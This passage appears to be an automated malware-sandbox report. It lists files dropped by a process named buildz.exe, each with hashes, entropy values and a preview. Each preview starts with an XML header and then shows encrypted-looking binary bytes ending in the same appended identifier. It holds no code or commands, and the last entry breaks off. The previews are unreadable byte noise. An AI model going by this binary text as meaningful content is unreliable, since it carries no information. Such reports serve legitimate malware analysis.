                        Preview:<?xml......9.F.).....!)Z...BG.GCA.w.......s.=..S.Nis$..Gb.}....,..r....c..Z.U...v/..|.A.G....b.lmw.....QtA....V.z..4IvQ.^..O.?.,.X..... ..C..J..Q.5.....Q....9.,....... /..V..d.<=.a.d..M..H..^.9..d.a#85bI.%....2>....2.J....!..^\t.l.2.f..5.ML....?......w..2......~i.'y.2.hy../.W9..\.0....r.jI..w......P......9..."...Z%q|...p......Rf$...<.S..(....e:n.e.H..\.e<v..Y.v..4C@..8z.....d.|U...a....(.?]Q).$.&_.....A.......`'.0MBC.......[.......#).....R?j@W...I....z1|!.....o./...\.... ...-..a.B(..l...Y..{......q..RU-..py_....c.}..@..A....&.0}k..N... I...(...u.....2i1......;u7..j>..ag....e...[..{..&.....Q..^.......m.:..x.W..~.M....b...z?t...}..S.9=1?o....D^....4!.I8?..z!....I.=.iHHEv.d.Ms.......B..Rf...kL'..(....&..y.._.O.PSzAC .ZbEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):740
                        Entropy (8bit):7.68470528879131
                        Encrypted:false
                        SSDEEP:12:Dst6F6GRRNezCmJhoHGcZptq0T5H6nVt6N0nUxX0jn//5qHt/xLeKIK3GW/26Gcq:ZF7XNezCmQDD9anVQcUxkz//O/VkK2Wg
                        MD5:05F1ED27E92BABC767F34F0D36764C82
                        SHA1:24D59D1BB95B8595553BBF45AD2132ED2662892F
                        SHA-256:92C0062C3541157A682274B6147152992E171001E51D397E561F863035BCC174
                        SHA-512:2C89FB42F1C1AAADC197403DC3D750EEE7718956EF438FA6008AC021B857137793547EA28BE7C9AAFF233654A66BE6E63211304967185D99C087EC73195ECF76
                        Malicious:false
                        Preview:<?xml<|...z...$v_.5.h...0.zf$.P...)....c..=....:=...m.n..)D....X..*q.....);..S.U..4.VS...0.ijD..2....3b...!z.w.Z+._.?..,.....T....n.$l-l....m..`..9....h.w5.\^vr.....5~5^.[Dr.....o...h...-."}..h....b....$'dJ.*j..... P.\0..*...|...'*.8.#.O....1.....*.E..@.u.....1.(.......9.Y..%'!..@1."..n.O...1q..'.!4.9r..d.V..Aop....+.s&.F0....dv..G.:....Q.....;...fsDV7.......4..[...Y_..} 9k..H^.R.$..bu%..j.R....lJ):...h|\BZ...].7eW.#+.....6[....:l4.......?.=....d'w....A..|5...UO.+..6`O)..(}C.-...B......,......(.....i....U....y{...N.{.....f....5....t.&.\...(..3..ztNw.l ...c.m...D3..9...2 uU.O..5. z..C...,...!..gM.Q...R...........EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):807
                        Entropy (8bit):7.746545614706404
                        Encrypted:false
                        SSDEEP:24:FWpbdAMbMPjoZmk+V/14WCiDE4yxS9t8h5JOzowGbD:FGbWMYcYkeUhST8/JTwUD
                        MD5:3464C499E6BFD21FBC9122E09C857A69
                        SHA1:0CBB5409B95838128EF1571E32058B26C225C59D
                        SHA-256:69309E2CBA3AB49ADBEED626E7D7D7353CBC50FC25D91A9DEAA8601C515214CC
                        SHA-512:986EE72B82498CD16B334315DAA7D6F527960351B0FB6C604D940B6BBC1210410A195577200FC8F3D6CDB2509DC39DA3AEFF70A0A871FC9D3E0427633999498D
                        Malicious:false
                        Preview:<?xml."d.B.A......U'.'9.Zx.}U./....|'..o...)..=....-.;.J..v.Oa.t.....(Iv..qh...J...]..t.&......V..F. .R.H.c.9..w.3n{cW.l.7.....[....I.7.............*..=W....Jm..|Di.Mv$.e#s.......u~.mH.3.i......9c.j.....].8..$...<...<.H&,.C.Z........J."7H..tctc.I|..m...Ip...`...R."..........#}..<.....).....`MEGJ.b.Z..2<..[4...... Q....K.345K...D...-P...U...(...\u......y*o..0....?...S..<lN.E..ipf..~.........8.|}.p.....6..tU.%....].....3........&..b.Z"$.Go.d~...q..1...qR.....c.X..f.-.F.T..#...{..3.....98.....s.^._.p....vw...,Y..M03......u.t.u...t_Mau*...e...j.?..0.....0....(...@.f+?..z.z..c...t....83'H?R.....x..w5J";.w.s..:/.J%...}..>.^W@$..0.xynQ..'..}>..}..l.f.1>.-.!R[...|..[...G..io\V`.{....../.....8.=..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):741
                        Entropy (8bit):7.708252161298773
                        Encrypted:false
                        SSDEEP:12:6JfmC2rj5BlLTX0IklnGn3fsX73GrrKNx4v862hgYA2SMLM8KF04QUax17e0RDQX:6QTJHn0ZMn3C72yHprAf8PUE9lQhNqGX
                        MD5:C0E3DDDC809E87C3653C1414FCFFB1DB
                        SHA1:365F13E30923BAB7C24D5E55AAB6D10161F55CB4
                        SHA-256:59DC324BCFB263ACDFD88F8FDBDC1F45498D943741D5E30B10C8F02D94A3D6DF
                        SHA-512:9AF847234E143826B4CBBE5BC174CCC318E29B458E7E02A43FBB605E171608E678AFBD3C88BE6937EB41C315246D4D7CA0524F2D15BA6BB081E68AAB6BF96E1A
                        Malicious:false
                        Preview:<?xml.F...q....h|..T.n.v!i......). .]9f.;.....'.e...kTs.E.y..x........ '.[.Uk..e...]...N.%F.......L.....+..2.*6g...DL.y.gH....^....'s..`.....4:.=..q.k.....@D...V'/%.L.g.B...A.].%...u...^....7...'q.s..!kat.On.Y.A...D.l.I...;:...W...G._.>.:K..R.n`.'..2]..Q.A.t.h..G.p.fQ.e.....7....e..^...^v..$......eY.E."x2E.........&8`.)z.Ak..Y]hm....\.(B..W.O.P.7..W$\.6J#8f..}.....8i!|4.8 .a.}%0W.g.E..i.cd.n.7....).v..D.o.t."~.c....l...W-.y....F^.=..Q.Hw;ra.(.y.<..-E.....,.Q.t.G.. ...00.p\.....<....5}..S.Nu.V....d..1!..'..O+.?o..^..............I...j.G..%#...z...g...$'..Mpx.5...\.y.QH.&_bsP.{......u.kh(.Q.8..)Dz....q.fz..@C....}.2AQ.,J...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):802
                        Entropy (8bit):7.717481485498594
                        Encrypted:false
                        SSDEEP:24:kS+wnqk3eE4VMiUQ+p5lM7Mb+IN3npCu4GbD:n+gqk3sMlKG+IN3npl4UD
                        MD5:74FE0DE06A5F9EACAEBC6A27B55098D3
                        SHA1:F5B2F760DB23646A88D2A292BB4744146F358B56
                        SHA-256:4FC6DFB623DE1F1E9F9F2C24AC8ADA6B5B7DDC932E71573CD5A3EABCE198E9BD
                        SHA-512:F68E95367BFFA2E2177B913F8B14BA7A50A4725563F487EF2F7593FF4770B4B4431AAA02D18B403223A29FB7B6FC4F93E7B6EDD6C956CD1E9C64E4F284E70C6E
                        Malicious:false
                        Preview:<?xml.....Z.:nWC....!..T...}.)Z.\.Y.).4.pW.....y.1..j.n.8.=...e..7.yN..L....1.L].vv.m.A.9.!.....J.. #......z.....oZ........g...l..3..^..F...S...NheB.kL".\.`.T_.....Q.dz.R3a...N...fG<)..CU0. .:+..)D+.+T........\.J.}.3......... .lDT....^.~.../....V.,.......&P./.!.......].Ml......4'.:L..n^...)L..[....E..z.L.G.....A.!|.y....8...$...m....M...6e.._8.m...>?.$.}..."Lu..S..<G..M..G..m.$}.Y........E.\..%..#.6.Q`......B.......1o....u"...b.g.L..08.K.].=...O.b.,...0..S.G.......Cm...3.r....p.B.{1W...s....i..]...c_....JR...m.yY...l.VcLQ.~....6.vg.d=.R.m&.......b[W.._..0.....e@g.VY.7...T.=....F.2...u...|*.|TWI.."...c.ZP\go....#.4MBs..M=.S....9.l......../K.!N.yL.......!..ti]....Dpp....$..k...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):749
                        Entropy (8bit):7.708053045256629
                        Encrypted:false
                        SSDEEP:12:ZK41rPUijIWO7ziq52RHk7fLuKF2bWJnkzKnLqMopxiy/26Gcii9a:T1rPUijIt7ePHk+KFogkGnLlYRGbD
                        MD5:69E0FB94814E522BC443546AAE3C4590
                        SHA1:138C63179FD64B1525E624892C20B5816EC96B28
                        SHA-256:7905720A0DCF1F81DF2218BF783707E0BB3788CCB12F735F6C7568CFE2958BEB
                        SHA-512:263108937366B1EB427499AC3BDFD947B5E6A88518A1B5DAD9161348C8C948CE0BAC4A6B6797B1F649E71A1B990D4FE6DF4DE2ED657CAB31EBE574242D937161
                        Malicious:false
                        Preview:<?xml..#7s..x..!.M.B....!.Y.k,iNg.y.I...|R...~....@.S.k..<e..R.........O.Va.;TP,......a.=.@....Tj.[.......A{.B.1..Ws=..a..CB..}].Ah..CU.m`..r......9.s..Pv/D. 2C..O...........L...F..|Z.$.~..Q.A.....c.w2f..x.m...p~.4_....rl.1Z...sI0..}'..0.z.p.=.J....e.U.D...a..a..a.4OP....K.@....@.L{.b7WZ.C.....dl...@.l..W .?..DH.Q.x...^..%}.Y...h|i.d.....5.\y......'V3.,....`.QG..t..w.[.`.........[...Ud..{7S0.*..b....q..UQW..5.....Qy$!\.v.[......`.;..`..O.f..3..^Y.P.i..s.F.=.D....P,3....E.t.._p..V.L..9.G.&......+%.P.....{...].....1c..$............?.u$.w.,......6.y....!..,.f.<u...Y..MR..jY.5.<n.K.q.1..ZU..*.s....)......&.t'.EQ..>..ZR.p..../..w.*...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):805
                        Entropy (8bit):7.745247977700882
                        Encrypted:false
                        SSDEEP:12:sWacjdYhyFnJGHEMX2c3vMtp062oR27eA8ZwTENTWnEDl9CM+bOOKgil3HYlu82b:QE2KIHEttx2NR8Gg0y9CMWO5XYluOGbD
                        MD5:7802CB2D5EFD5E744D9BF966015126D2
                        SHA1:C9197FBF3031FA2F8ACA22B7F0BE71B673536703
                        SHA-256:447031C1B1B5E9D4F1FE1EAB30E532401208EE6AC3DF889AB567F87BA27930CF
                        SHA-512:FA9D6F89E60F3EFA20C24F292C5F52C8C174E1DC5DF8BDAF86B5FCCBA6C1D41ED6D3B65C32889F554A23A1D2B1ED83621273A0956D5C58A3033032A496B0778F
                        Malicious:false
                        Preview:<?xmlQ....R$..&^..k..NswA|Wb0ve..I...Al..(.d(V.1k...7.L..GI...&da.:7j. -<..k..Uu..H.......B./wu.c.5..W..:J.D.#...y....P.onNz..QE.z.t.$4..42?...v%...t..Y.<,)O.....N.[.......!._....5.m.#6.b.>...D....,.A..a./..|.......[iJ........5...$...W..C...q9L.Z.>.".D......,d.P'.f......r.....).......$.... <L\>91..r.C.3j...q.}=...y..\...8.b...U..6......iv#.0...8.>..K......w-...!..q.W...1...z....+]DX..WvU<$g..-.h_3..ax.8z.......?tHG.....H7>..|P..Rg..|..).!8..<.Y+..q...0.F....'....Z{..lA/.Z....1....'.N.....YW..y..`.h\...Z_I....".2^.=.V.x8...9.0%...;.k..2.}LfQu..-y2.."...7oL|}..Ow6l.!.....?z..j....H...A}.9.w.[>@...........@..........,."..B.y......^dM..!..(G.......1.%Q....3..>.[;....U...h.J.g..Z).0KEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):765
                        Entropy (8bit):7.72784739474487
                        Encrypted:false
                        SSDEEP:12:sIy9jInE5UjJLfkJWw0aszXaP2fXJANYkVrYEAThzMmnkq7UIRNywYKkD2Vm/26A:CjInEKCJuasOP2PJnkVrYEAThzkUlNrf
                        MD5:01292F5B2E0D20CE52DBC230221DECD3
                        SHA1:33205E3F3138AC1369B4BC573ADE0471172450B6
                        SHA-256:8B1D72A515F4EEB876B619D6C2F33082F2457C73DF285196508503ACE0AAFD32
                        SHA-512:A72D42D4D6C8981B1DEAAD7E5BF252BA6344611F9696F0D4C91EC3D8FE2C8161D05F9F374A8CC614EA43BA3FCC075D841AFB0BBF552679D3B020DB764062FD0B
                        Malicious:false
                        Preview:<?xml..J{...kT...@.;.-.A....n\Wt...m..]....(...Y...O.0p..\....n.1..|;qw......"w8.p.Y*(y.......q..y....O....G6@....;t..y[~pC...a.S....u.x..B[L..}........B.J.....mw}..%.L/....X.v.......WCIu.a.Q...........Y.L...Kh...........Id.O........._...N...b....O..H......K..r.Z.:...6...*^.zg.;{......]...O....R....)b.-.L|..h.Bs..O....._.N>T..j...~./,.L.\^...!.$.".0..q.....m...e.....:?[.m..B).~.g}O.o]&3-......"..A...v...;s}*xM...,...{..7..".%..) K...!..(K..,A.CB..:..B=).q........]@.G=..3.......(L,...z>....[.......~...l'.2)X....Y}....B......k6.*8./PU..t...e.........i.}2^..X.O.#.......F...y.(....P.. ....b.......8A.l?....M..v._E..V.>...Q..3..>......J..q.J.,).]...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):808
                        Entropy (8bit):7.6952463019867725
                        Encrypted:false
                        SSDEEP:12:QOfu6sqY9hYBgeVgoqPoSMujtmGsKuGv3r51N7oGtyMbJo68bVLAYgvTnemr26GX:Dm6YkBgeVz+U0bpryGtfb8sjTeWGbD
                        MD5:8D8B2C636DB3C648278BF60004AAEF08
                        SHA1:078B32582E67D23E2A79566A7895F4A2A3055FBD
                        SHA-256:78175469F1F9E67BF70DA8AD3704881FB7C2DDE1B6184C49469462E23CBA67DC
                        SHA-512:373D58746D352BDFA5E0227B4E27E1D8069E97EAE2BE0023B6BC72E7B0125C70C99FED496EFEC94B4BFECAB692534383859830B96969663A5A0848876FE5B146
                        Malicious:false
                        Preview:<?xml@2...$D.%p=...O#.-.....^.V.L.loEe....2..P.0.u|(.. $..u........6=......>t....L./..1..*.ap..u.p.K..`...y.L.6._.v.1[.J..b.H.Na..".....X.D/_Q.e....&...u.S.I.J$.J..;...1.nt.....9.^.F...R..({.+.Ct........OV.w..O.....qV<.z..f.TD.:.3......V.q..c...........l.6..:!_....T...Q...<..;.....a...P......Il.y....6...%*.#..R..B..=.(...0&.J.........uE}...bZ..<.0.b.9.z*..Ir.%^...2|.*?...h.....vX.#.........U}F.>..f...%|.*...j..W4Q.z...-.....qa.[q......D.e;...v2.....2..;y4..8.g]X....K....9N..@.....D.*3..C.e.k...)a...7#ud(*h...*...Ha..c0..6..l*...2.l..=-m..:........U.?75.r.e....k.H.t........@.p.$.Qo.;......$.%8gr+#...j.i..QSI.....K.zR.. ...q...r...0...c.....C..sd.\.BR.+/..*... ..C..._.D;...C.j5[.9...U.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):760
                        Entropy (8bit):7.724293229132904
                        Encrypted:false
                        SSDEEP:12:8UisMBjsK/9uNdjSybadQkN/+U+bbYQqUn6TrQ3BrBuzbysd126Gcii9a:pisMRsKQ7a+kd+tbthCrin0bys3GbD
                        MD5:867BD681610BDDB6620AADC4284060B9
                        SHA1:0ED01F4540D704280CC2C849BEC7AEC418F4CEFE
                        SHA-256:C20D2C86D4AE7479AAA3C00EA13540073C7B8F63FBB8202A41ACF6BB768596CB
                        SHA-512:8FB8151CADCF662EF9E54FDDD12ED8E063AD75EE8F3CE19DEAFA87FF8177C9411C989AB698483D9D9F66F846BAEF012C2AE94B3909954059D47A8D817AB216E0
                        Malicious:false
                        Preview:<?xml.F..3.=dS...`]s.7h...bsxK=.+AR`.....-.Z......D.".F...M......(...s.......\..2-3.p.u.K....1..B....6@...+...W....B.........?{wS../4...&+..R.)M....t....:.=.....('j.zq...L#..6....q.%.r1......I..r/.:.Tux.c.Q.+A.w..*...9....4"...{..-...~....o....;K .....3..v.nB..Y..'..t.tD.#..h.......$.,.}A..lN...`....X..c.....~`.W.-.L...q....G..R..hf#....\'......*.....>p.%..ktHW...._.Tq.`k....{x@....gaX`.+.g,..zM.tf...|bl..m.# .......(....0.(...........~i..>.i.N:6..\9.....7...H^..4.b.QLd.E-.L... X-@.k.r4D...+u.x......b;....B.....X-.K.#j.LA.....p;...G....A.08.FB.?0...8r_s....V$E..M.....hg.x..w.P.!..w.=*.E..n.d.Q0... .=l<)~..z....:|.9(.1nP....um..C...:....vt.]..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):807
                        Entropy (8bit):7.707440243102908
                        Encrypted:false
                        SSDEEP:12:D4pSKmDtMlCSgf06cOdlngZG5illzAF+6NQKYGk2+q6Z2rFHmjJLoaoP4AdX/26A:MDgf0dylgblf6OZzL+xHmjJJUd3GbD
                        MD5:2A17B9C33BAA9768BBA1D46B4D7E45F8
                        SHA1:DFDA04F7AE788952E005775FF0B1EEEEB08ADAC6
                        SHA-256:BF70F20D1DFE35F3A0007E705BAFF9EAE9E1320B4F339A2683678B296E77094E
                        SHA-512:F85F63C9344B629E41B8525AD4E01227BF90236417B60C6EA546817B53908455642453AF70B12F4AB3DEB127ED175D6E9682BC07776B23498FA21FAC68251644
                        Malicious:false
                        Preview:<?xml.a.t.F......*..U. vA..x.Cq.ug..`8&.h.%^.Tzp.......H...o....)M.8....a..v..seG.'T.eq...V...Q.Z.N..P.P..v.e...OJW.Kc.B...r...\.C_w'Q.p...6......@.\.x.....Q..$..i.y2..ub..N.v...FH.j.}U:.#.@xFRX...N.~u\..4v=...z...;9...:D.c...........i..."..... ....).~O+w.>.n.."..o.x...6a'.........(.P~2.1.."..R..-.{={N;.....#....W......8wJ.....3...."b.[..3 No.3...ad.......j.Z..)..+...g...J..M..-.....f.Au..f.-...r..p.8!.>S}7 ..U.p\..}2d......N.a.-.d..h{.r..N...a..NP.<.../V...1.@...........g.wj.{.;.M^5F.....6.e..h1.\l....2{O..iP.....X..v=sG......D..mP.(.W`.C.....-....PA....pAm..4,..u.I...*..C5.m..;.\.s~.9..VW..../..r.,?..P.\.Y..N[...|........2...........e..G...'...`.~..,...bA..G...z.`2^...!d1......O.....V.%dEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):752
                        Entropy (8bit):7.6865327080666335
                        Encrypted:false
                        SSDEEP:12:7q/upBEgerSs86bLlnDi1a/hOWQ51kpkNz9sLy+Rfm9WTaYn26Gcii9a:7q/ABEnSs86bLlnGa/hOWQIurYy+Rf1y
                        MD5:EA53C0102EF47C61E66810ED7A6A1D14
                        SHA1:57ABE2F84EB8B4131D7D1D58AAD67AC654818576
                        SHA-256:B5FA4B9F8BFC2A2304CDACE85D3F83395AFCF69AD44DB9A1133C1C5C0E8F5189
                        SHA-512:6C42418B84E5113763C06D70F1493E273F4E8D5005D2CF5B78427813928422D19CD7D3FD344287B2337677955BED1D8737BAA8241AEE12B265D102C1308DC3CD
                        Malicious:false
                        Preview:<?xml...T.1!}..J..s..f...e..c..........z.L.O.... Ke.e.{[.{....K..>...nR@.S.GH...!U..{.9.JJ....S..O.*.......NP.....;+C....E.D.._...P"...[../.'.s..o~...#..q`2b.V ..s}.36.^s%.......Q..c...e.7q.V....a1.@,..b{..Y..._.-...%....V.....}.|.3..xJ.-..hbw....dW....8...[..PU'...:.....H.N.7..w.7QH<.K..B. "...........P..NDZ..:...e,..[Y...O...b..6.3.."....a..`..r..u...bD..u..0..H.z......92h.....;g!.y..9VQ..~.h..p......a'#...J..M.j.W..I..7.U..1....\v>O.P&.....j..<,.0.p.H.{:}A..|.C...g...^......~!.....[.\.U.......k6.l.k.lMk...zO.v......b.3>.C<.3y.P.w.AL.Q.`@.K..C.....O.J6.y.... ...7.}.3.......2X.jW..xm.?<.&.b.......[..F........R...8...6....W..ku{*.t...\EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):805
                        Entropy (8bit):7.7256325119346485
                        Encrypted:false
                        SSDEEP:24:5MJdT3NlKZiRUf+ocE77mXGImnWPv3PAtoR52rU1GbD:6h3jgiRfoxJI/PvtKr4UD
                        MD5:4093CC957B150E42DEE155F7B788CEA0
                        SHA1:01B7F4DC761BF8011B5B67B7EB5DF93BEA553A46
                        SHA-256:5B95B942E79575D786FE3FB3B2D9EBEE55D66848D6DD6A21E447DA86CCB9BCC5
                        SHA-512:EC2C9E048491F4904CBFFA79FCFA155DC18E3819A9AE84B0F8538B14AD752D77625294DACFB88CB506696B5A17D502115C237882531159CAE13760C0FAE405F7
                        Malicious:false
                        Preview:<?xml.W......./..).D.....PG"fN.|.G...w=.y{{..K......V.....2..B._k.O......k..6?sgK.2....N....?...7.|..S.%J..h.}%#.....-...n..;....T.A.H.p.}7.....`.>...wC..6#..G.$....6.&72.`[..>!.... ...N5..U..YY..K..h.....w.....\...!;-..._.......m<.\.4.".v..E..n..w.U..Lb.#......EA'~qh.....hY.9..M.or.......GU..|=..?:.2(...)(..o.)`.9.J/.G.U.j...............$..h.2.qU...+...OR...M..6.....{....MJ.{!]dn.@$........._.....Mk.&.3I..@.wHqNeJ....2....Z.1.4G....M.=............N.K..?..C.>...b.ye.].......2.....|...}s=..O....:......Q..M.MS...C(...Z..%..4..<`.F.=..y0.V..f^9.......!.PT.DI....H........d.!.C.N..K.VU....:...n..a..A..e...^J.y..w.....}.>.]g...F...#..0&.Ij.x.."..z.qb_?.-...y...U(.._.+)n..W..H....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):738
                        Entropy (8bit):7.700626971206792
                        Encrypted:false
                        SSDEEP:12:XAYribIRFJhdqmQPib5f31vhOEAFbnz2+sW4YD3eVTi26Gcii9a:EY/q6b5flJOhF7zjR4HEGbD
                        MD5:DD775F8C14FB9EEEF7D7ADDAC35D172F
                        SHA1:523E00CEC57733389CCCB18FFAD02D2381DD54FC
                        SHA-256:A06B99BC1DC34E4162086B0AB5DE69186F93E95EB417650645FF2DF834A58220
                        SHA-512:2409B5BA6825090D3A909C59BF194902D84CD60B12FC01ED5FE9589FAC0A9942B7F3D464E7F37390AF64EF688566EA72B2A15541E32F8EC07757589A43E6792A
                        Malicious:false
                        Preview:<?xml.......7.T.6...~u....F.*......,...C...9$....G.&l.YQ9..v.^..!.....n......v3.%../...].......K.0..T.&.{5.d.g.....+L.V...JY.%.5]F.%1.Z...U....r.8.H*).... .&.O..........-..G....3y.H0q.WBGw3.SB...b....7.m......>...q.!So....I;...p....)j`bKw....{.....G..K...c.*.\...+.bp.I.x...0...:&.o..d..e.M..ok.UW..>=.K..Ex..?....u..g.b{.t.oAM..^`.dL...../.d........P....~.*...Wt.>x...q.h.v6......E.O.'L.n....`..".e..s9|.,|.'KI../Zu.*0..jD.a4d.b.7".....5MM].Kfd.%..#m..7m......`.;!.....]...ZN.......X6^..p"....S.q.hg.o....ySp:=.J..X5..N.C.-....y...:.=.."..?|.`..;.....o./.....4[*~-..3t.N....K..q..hQ...=...LsR.SC...q...c...........|.'..]..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):801
                        Entropy (8bit):7.674280538371522
                        Encrypted:false
                        SSDEEP:12:GKDGhD9KRFkEITIDs8TaJysV1p1MUC4032fDeyU4l7OKOMRnb1H0MDhy26Gcii9a:9Dq0FmTE3291p9Cbm7DNdrlQGbD
                        MD5:757B47F0BECC3DDC6A97F6865EDB3C9B
                        SHA1:CEB97D0776D40562710D96596F3092780034E85C
                        SHA-256:CB94C89325CC0B4020CD2938D4B62C4FA26998F35F758A9C739713930C117DFD
                        SHA-512:DB6B284D5CA7751A494912A44A69175CD04A671617F780493DF49B14ECDC78B04AD0174E537C663364EEA367920D6768B1E7803EC84BF483E6ECD4EA7B904393
                        Malicious:false
                        Preview:<?xml.. x..@.S.....4./.B}a..........3.........,...F..~2.F..ZXeH.V.>N.........l_t_.....I.A o%6A.1...-r.../.".w.../A...`....w.R.....t.N.(}B./iK.................)..k....z.....u1K5..X...S...N...9.......7:.;.l.."M......?:R..7geqN.{........y.d....1.SV.x!IW.*.&c`c..'!...+e.....c..oFM....P..]c...<v..:.A.E.rX..[=y...A.b....F..?&v..."..ai.[...:=[..iP.T.'.[..`....Q.....m.C....P.....|i.*.O@.....n]...A.7uG.r.v._#u..z.F.J.<.8?\.1....{..-.yT*.0|....8..M...]......(.U1?..U.O. s.K....n.p.._.J5jx....x..*.......!8.P.*../.S......|...A.zx|:..g.g.$hnWG.T%..(.F.-.!.1.uu|....%;....%Z.)..\S.2.4At.>..1.wv..#..I..r..!.V.....L|j\s.L....[..._..y.^ .-1P~.R...)....j.o]A(m...B.]..#_..X..a..-$..R...0y.x...VE..%v.8Vi.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):507
                        Entropy (8bit):7.513999601258194
                        Encrypted:false
                        SSDEEP:12:bElfI/bdoQ0pykLV7DWbKCibWK5rDxf3U/26Gcii9a:+ixotD9DWbBiBaGbD
                        MD5:4D4D53172E5D8EC060C7B968A086A5DA
                        SHA1:1FF7A38761116F432B535E87D4302105C873DAA8
                        SHA-256:A3179E9C4E4F61C1C021F484DE098A121C73A5F7F527E92B7CE99EC59C52DBD8
                        SHA-512:0C91BE94D349FB4B51674A660BC488B2CA1921BDCF759E70120F2D2D9FD7EF1BE0E9B630E0DB15C1258BE914202A936D547F0466BD39F1A01B8B6C5F04CEE305
                        Malicious:false
                        Preview:<?xml...Hq....b\I}b.....i,.XB.<.Q..].....=.....yHRF.A.......M.e..L..k2..&...N.;..'k......V.....>.....=.......ky..6..V.o.a.......I..yiCHo.!N..K.@H......i.#..(.............ui-.&........."...%B.R9Q...T.i.NO.U....@.........n..*.5...-jg...nm..%l.....-....{.9...~oMB..M.C>..L.*pu~oG.6CU.....A.9..3.c..!+_.|5,x..!.h......9Q..^....l....n..k&).0.$w,..8.&..8.....&Nh.K[^.(P...ma.s7..7......V.[....!...RrG......2..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2285
                        Entropy (8bit):7.930070505584508
                        Encrypted:false
                        SSDEEP:48:UrvQzdqqDrA5LBnBiEmXB52pN9Kdj5/v3l2ES28Sd2l2AKxouUD:YQBqCE5LBL2BwNK15/v3sEn8NlpKxhA
                        MD5:F9E66458BAF78B5EF72447E932CA1E95
                        SHA1:6889F93824E8A2BABD4F34BF06E7434D9526D745
                        SHA-256:40C5C57A8D54D859CCA59162DBBDC0B5C7E64BF26A70D42B70A2372484D25960
                        SHA-512:65B6AB2D6765B61E1F8F7B988391D583597784800EE133E21E28BA3F58FB1D73BE4D41DEB483585843D9B0B405B96228DD67972BAC136BC3925DED70E92DF25C
                        Malicious:false
                        Preview:<?xmlcx.r{.Mm1C...,Q....Cl8....+..+k......?>.3.]d.x......b`.+....&.%.T..c..5..W..o?...d..G./..d....p.ll....jt.nJI;<.h....AA[.59o.A....~.<.|e{IPY...V]@..mV..G..*...T.B.22d....5.$.5.\QppG*W-.........Yz4Yx...@.4.n'X{.....T..8*.;. . .6.;5.8su....C|.H.PSZ...{.$GE.\.J;.g.LD...3....r.S...!a...^..).`a^.@.l{....].Gk.-D...#;.2......(.J..Z..............;.<....6p..+a.2..q.%.kqe.P....N)k'.Y.;+.Q.O.c...V.....ix...<.L.8Vc...N .0.c.q..Y..g....0...)9.X$....>c.2.f..9..K..w.._....L.0/. 